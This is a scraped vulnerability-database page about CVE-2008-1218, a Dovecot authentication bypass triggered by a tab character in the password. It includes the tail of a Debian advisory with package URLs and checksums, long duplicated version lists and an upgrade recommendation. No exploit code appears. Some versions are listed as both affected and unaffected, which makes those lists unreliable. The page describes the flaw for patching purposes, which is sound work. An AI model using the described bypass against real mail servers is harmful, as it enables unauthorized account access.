    Size/MD5 checksum:  1123030 47eb9fddcc68c2c213afa10c8e3d8747
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_arm.deb
    Size/MD5 checksum:   506134 0f4d939f2cf68f4e5b01140c846e50bc
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_arm.deb
    Size/MD5 checksum:   537564 82310ae4e42406429f8ade7cbb81abf0

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_hppa.deb
    Size/MD5 checksum:  1298818 603d12284115b6349e1d0334263d2af0
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_hppa.deb
    Size/MD5 checksum:   562192 413ac964849698428c1b08e9cc9075bc
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_hppa.deb
    Size/MD5 checksum:   598934 811c32b5c7e2009e5bf2f0ee0ea26859

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_i386.deb
    Size/MD5 checksum:  1133484 3bf26ab783ddffed0b3c5ee53225ba20
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_i386.deb
    Size/MD5 checksum:   546528 d53c11fd1c39870bd208d684e70e7551
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_i386.deb
    Size/MD5 checksum:   514280 e85dcbcdd9b85f6e09cdeb4c82b47916

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_ia64.deb
    Size/MD5 checksum:   793878 106fe266dd26373615772b4e3636a914
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_ia64.deb
    Size/MD5 checksum:   737582 18b15162711b22a704d0ff1ff26e0261
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_ia64.deb
    Size/MD5 checksum:  1701788 7535b0a3407f664efa66bcf86966ff85

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_mips.deb
    Size/MD5 checksum:   559520 96d7ff1bbd3a38fbdd3bd06b4bc939fb
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_mips.deb
    Size/MD5 checksum:   594680 41536feb8048183b78f0d1742278520c
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_mips.deb
    Size/MD5 checksum:  1265800 a42823e1253c78709d5d1c18668d9b40

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_mipsel.deb
    Size/MD5 checksum:  1268408 25c8582fea24e3174283066b7c8b6525
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_mipsel.deb
    Size/MD5 checksum:   594912 264c368593a3fe7a9268aadee2ab1292
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_mipsel.deb
    Size/MD5 checksum:   558832 d2a20bbfe49d234d0f3c7911c17c9bfb

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_powerpc.deb
    Size/MD5 checksum:   569772 e49cc25c54e4fa88217e0fa555de6039
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_powerpc.deb
    Size/MD5 checksum:   536000 92330b2d1fa2ae8bf6c1b8f05cea3d59
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_powerpc.deb
    Size/MD5 checksum:  1212096 e2339d417408e14eba21b28684926a5b

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_s390.deb
    Size/MD5 checksum:   559786 3f7faca1fa56aa29a013068e14e7fada
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_s390.deb
    Size/MD5 checksum:  1290186 5b8722445aab8b59ba15beae695e7f77
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_s390.deb
    Size/MD5 checksum:   595498 ad3af123ee9c10dece62ff7cf0e84b35

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_sparc.deb
    Size/MD5 checksum:   533482 576d0f5a1a733dad01c868095488afcf
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_sparc.deb
    Size/MD5 checksum:  1108250 1ac8086c83312fec554abd74074cf7b2
  http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_sparc.deb
    Size/MD5 checksum:   501514 27d4aa890df60532d0a33167df7af219


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [email protected]
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBR9sKlL97/wQC1SS+AQIS8Qf/aV1FmLW+On+sucRUCqhiEgjXV92BttV6
J6fcjCkEuh0icV3KRjaJfbkSJbIBOHP+5piXHr2iTf4DqDlGCr5ztaQb/n1Xr9GR
EYphV8s+RfyAHO/uj8a0rgDL07eRhZ1AyLi38ARJBh4p3elBJOV/4ZrJbZcsO8Bd
wnUAAerEcoFUS8Sz6VN92QoWlsYcGZwL1vbuUCswCwr4OiNjyWggbOz/P0fPd3VW
ofiN9Tifg/MVfU6uMbG4g8HTKbrX9ryVc+HgXLwZI/UuYwtXP2r+svn0pEt30XwM
EfPdxup0JaOne/AQccbtWF96tHopfMfTf5cbCq5raQ2ELwsNTiuTfA==
=nlXo
-----END PGP SIGNATURE-----
    


漏洞信息


42979
Dovecot passdbs Argument Injection Authentication Bypass


漏洞描述


时间线


2008-03-10

Unknow
Unknow Unknow


解决方案

Upgrade to version 1.0.13 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.


相关参考


漏洞作者

Unknown or Incomplete


漏洞信息

Dovecot ‘Tab’ Character Password Check Security Bypass Vulnerability

Input Validation Error

28181
Yes No
2008-03-10 12:00:00 2008-10-07 05:58:00

The vendor reported this issue.


受影响的程序版本

Ubuntu Ubuntu Linux 7.10 sparc

Ubuntu Ubuntu Linux 7.10 powerpc

Ubuntu Ubuntu Linux 7.10 i386

Ubuntu Ubuntu Linux 7.10 amd64

Ubuntu Ubuntu Linux 7.04 sparc

Ubuntu Ubuntu Linux 7.04 powerpc

Ubuntu Ubuntu Linux 7.04 i386

Ubuntu Ubuntu Linux 7.04 amd64

Ubuntu Ubuntu Linux 6.10 sparc

Ubuntu Ubuntu Linux 6.10 powerpc

Ubuntu Ubuntu Linux 6.10 i386

Ubuntu Ubuntu Linux 6.10 amd64

Ubuntu Ubuntu Linux 6.06 LTS sparc

Ubuntu Ubuntu Linux 6.06 LTS powerpc

Ubuntu Ubuntu Linux 6.06 LTS i386

Ubuntu Ubuntu Linux 6.06 LTS amd64

S.u.S.E. openSUSE 11.0

S.u.S.E. openSUSE 10.3

S.u.S.E. openSUSE 10.2

rPath rPath Linux 1

Red Hat Fedora 8

Red Hat Fedora 7

Gentoo Linux 2007.0

Gentoo Linux

Dovecot Dovecot 1.0.12

Dovecot Dovecot 1.0.11

Dovecot Dovecot 1.0.11

Dovecot Dovecot 1.0.10

Dovecot Dovecot 1.0.9

Dovecot Dovecot 1.0.8

Dovecot Dovecot 1.0.7

Dovecot Dovecot 1.0.6

Dovecot Dovecot 1.0.5

Dovecot Dovecot 1.0.4

Dovecot Dovecot 1.0.3

Dovecot Dovecot 0.99.14

Dovecot Dovecot 0.99.13

Dovecot Dovecot 0.99.13

Dovecot Dovecot 0.99.10 .6

Dovecot Dovecot 1.1rc2

Dovecot Dovecot 1.0.RC9

Dovecot Dovecot 1.0.RC8

Dovecot Dovecot 1.0.RC7

Dovecot Dovecot 1.0.RC6

Dovecot Dovecot 1.0.RC5

Dovecot Dovecot 1.0.RC4

Dovecot Dovecot 1.0.RC3

Dovecot Dovecot 1.0.RC2

Dovecot Dovecot 1.0.RC15

Dovecot Dovecot 1.0.RC14

Dovecot Dovecot 1.0.RC13

Dovecot Dovecot 1.0.RC12

Dovecot Dovecot 1.0.RC11

Dovecot Dovecot 1.0.RC10

Dovecot Dovecot 1.0.rc1

Dovecot Dovecot 1.0.beta3

Dovecot Dovecot 1.0.Beta2

Dovecot Dovecot 1.0 rc29

Dovecot Dovecot 1.0 beta8

Dovecot Dovecot 1.0 beta7

Dovecot Dovecot 1.0

Debian Linux 4.0 sparc

Debian Linux 4.0 s/390

Debian Linux 4.0 powerpc

Debian Linux 4.0 mipsel

Debian Linux 4.0 mips

Debian Linux 4.0 m68k

Debian Linux 4.0 ia-64

Debian Linux 4.0 ia-32

Debian Linux 4.0 hppa

Debian Linux 4.0 arm

Debian Linux 4.0 amd64

Debian Linux 4.0 alpha

Debian Linux 4.0

Dovecot Dovecot 1.0.13

Dovecot Dovecot 1.1rc3


不受影响的程序版本

Dovecot Dovecot 1.0.13

Dovecot Dovecot 1.1rc3


漏洞讨论

Dovecot is prone to a security-bypass vulnerability because the application fails to adequately sanitize user-supplied input.



An attacker may exploit this issue to gain unauthorized access the affected application. Successful exploits will compromise the application.



Versions prior to Dovecot 1.0.13 and 1.1.rc3 are vulnerable. The vendor states that this issue affects only password databases that have blocking enabled.



NOTE: Reports indicate that this issue can be exploited only on versions after Dovecot 1.0.10, which introduced the 'skip_password_check' field.


漏洞利用

An attacker can exploit this issue using standard client applications.



The following exploit is available:


解决方案

The vendor released an update to address this issue. Please see the references for more information.





Dovecot Dovecot 1.0.RC11



Dovecot Dovecot 1.0 rc29



Dovecot Dovecot 1.0.RC4



Dovecot Dovecot 1.0 beta7



Dovecot Dovecot 1.0.RC12



Dovecot Dovecot 1.0.RC13



Dovecot Dovecot 1.0.RC3



Dovecot Dovecot 1.0.RC9



Dovecot Dovecot 1.0.RC8



Dovecot Dovecot 1.0.Beta2



Dovecot Dovecot 1.0



Dovecot Dovecot 1.0.RC15



Dovecot Dovecot 1.0.RC2



Dovecot Dovecot 1.0.RC14



Dovecot Dovecot 1.0.rc1



Dovecot Dovecot 1.1rc2



Dovecot Dovecot 1.0.beta3



Dovecot Dovecot 1.0.RC10



Dovecot Dovecot 1.0 beta8



Dovecot Dovecot 1.0.RC5



Dovecot Dovecot 1.0.RC7



Dovecot Dovecot 1.0.RC6



Dovecot Dovecot 0.99.10 .6



Dovecot Dovecot 0.99.13



Dovecot Dovecot 0.99.13



Dovecot Dovecot 0.99.14



Dovecot Dovecot 1.0.10



Dovecot Dovecot 1.0.11



Dovecot Dovecot 1.0.11



Dovecot Dovecot 1.0.12



Dovecot Dovecot 1.0.3



Dovecot Dovecot 1.0.4



Dovecot Dovecot 1.0.5



Dovecot Dovecot 1.0.6



Dovecot Dovecot 1.0.7



Dovecot Dovecot 1.0.8



Dovecot Dovecot 1.0.9


相关参考

本文标题:CVE-2008-1218-漏洞详情
本文链接:
(转载请附上本文链接)
http://vulsee.com/archives/vulsee_2019/0713_2933.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » CVE-2008-1218-漏洞详情
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们